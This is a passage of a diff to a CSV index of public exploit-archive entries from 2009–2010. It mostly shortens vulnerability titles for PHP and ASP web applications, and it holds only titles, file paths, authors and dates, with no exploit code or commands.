Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 +9260,platforms/php/webapps/9260.txt,"skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 +9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 +9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 -9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 +9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0 @@ -21369,10 +21372,10 @@ id,file,description,date,author,platform,type,port 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0 9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion",2009-07-30,SirGod,php,webapps,0 -9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection",2009-07-30,SirGod,php,webapps,0 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 -9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,php,webapps,0 +9312,platforms/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 @@ -21382,7 +21385,7 @@ id,file,description,date,author,platform,type,port 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 -9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 +9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 @@ -21395,7 +21398,7 @@ id,file,description,date,author,platform,type,port 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0 -9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 +9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 @@ -21404,18 +21407,18 @@ id,file,description,date,author,platform,type,port 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 -9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0 +9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 -9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 -9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0 +9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0 -9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0 -9371,platforms/php/webapps/9371.txt,"opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting",2009-08-05,Moudi,php,webapps,0 +9371,platforms/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 -9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 +9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 -9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 +9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 @@ -21427,7 +21430,7 @@ id,file,description,date,author,platform,type,port 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 -9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 +9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 @@ -21443,7 +21446,7 @@ id,file,description,date,author,platform,type,port 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 -9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 +9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure",2009-08-13,[]ViZiOn,php,webapps,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 @@ -21452,7 +21455,7 @@ id,file,description,date,author,platform,type,port 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 -9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 +9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -21489,7 +21492,7 @@ id,file,description,date,author,platform,type,port 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,cr4wl3r,php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 -9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 +9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 @@ -21534,7 +21537,7 @@ id,file,description,date,author,platform,type,port 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 -9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 +9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 @@ -21545,9 +21548,9 @@ id,file,description,date,author,platform,type,port 9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 -9640,platforms/php/webapps/9640.txt,"gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 +9640,platforms/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 -9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 +9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,php,webapps,0 9653,platforms/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 @@ -21561,7 +21564,7 @@ id,file,description,date,author,platform,type,port 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 -9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 +9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 @@ -21854,7 +21857,7 @@ id,file,description,date,author,platform,type,port 10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - (PageId) SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP - 'sitedetails.asp siteid' SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 -10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 +10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps,0 10461,platforms/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0 @@ -21862,7 +21865,7 @@ id,file,description,date,author,platform,type,port 10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0 -10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 +10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -21881,7 +21884,7 @@ id,file,description,date,author,platform,type,port 10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 +10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player.asp player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -21897,9 +21900,9 @@ id,file,description,date,author,platform,type,port 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0 +10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Authentication Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,php,webapps,0 -10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0 +10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Authentication Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 @@ -22196,7 +22199,7 @@ id,file,description,date,author,platform,type,port 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - (view_news) SQL Injection",2010-01-06,Err0R,php,webapps,0 -11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-06,"Zer0 Thunder",php,webapps,0 +11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",php,webapps,0 11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps,0 11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Download",2010-01-06,indoushka,asp,webapps,0 11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Download",2010-01-06,indoushka,asp,webapps,0 @@ -22242,12 +22245,12 @@ id,file,description,date,author,platform,type,port 11098,platforms/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure",2010-01-10,ViRuSMaN,asp,webapps,0 11101,platforms/hardware/webapps/11101.txt,"Multiple D-Link Routers - Authentication Bypass",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x - Arbitrary File Upload",2010-01-11,Cyber_945,php,webapps,0 -11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 +11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,php,webapps,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,ALTBTA,php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps,0 -11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 +11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80 @@ -22287,7 +22290,7 @@ id,file,description,date,author,platform,type,port 11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11222,platforms/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",2010-01-22,snakespc,php,webapps,0 -11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic",php,webapps,0 +11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2010-01-22,"Milos Zivanovic",php,webapps,0 11225,platforms/php/webapps/11225.txt,"Joomla! Component com_gurujibook - SQL Injection",2010-01-22,snakespc,php,webapps,0 11226,platforms/php/webapps/11226.txt,"Joomla! Component com_biographies - SQL Injection",2010-01-22,snakespc,php,webapps,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps,0 @@ -22406,7 +22409,7 @@ id,file,description,date,author,platform,type,port 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL 